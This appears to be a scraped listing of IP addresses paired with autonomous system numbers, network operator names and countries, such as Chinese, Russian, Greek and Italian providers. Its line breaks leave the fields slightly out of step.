23724 CHINANET-IDC-BJ-APIDCChinaTelecommunicationsCorporation false
101.159.127.18
 unknown China
9394 CTTNETChinaTieTongTelecommunicationsCorporationCN false
213.110.50.46
 unknown Russian Federation
39860 INTEKS-ASRU false
178.147.43.6
 unknown Greece
6799 OTENET-GRAthens-GreeceGR false
181.78.50.118
 unknown Argentina
18747 IFX18747US false
178.180.8.249
 unknown Poland
12912 TMPL false
170.45.183.34
 unknown United States
264957 CoopercitrusCooperativadeProdutoresRuraisBR false
109.119.188.211
 unknown Italy
30722 VODAFONE-IT-ASNIT false
181.175.43.11
 unknown Ecuador
14522 SatnetEC false
170.113.24.222
 unknown United States
22347 DORSEY-WHITNEYUS false
213.85.209.38
 unknown Russian Federation
8615 CNT-ASMoscowRussiaRU false
101.107.22.224
 unknown China
4847 CNIX-APChinaNetworksInter-ExchangeCN false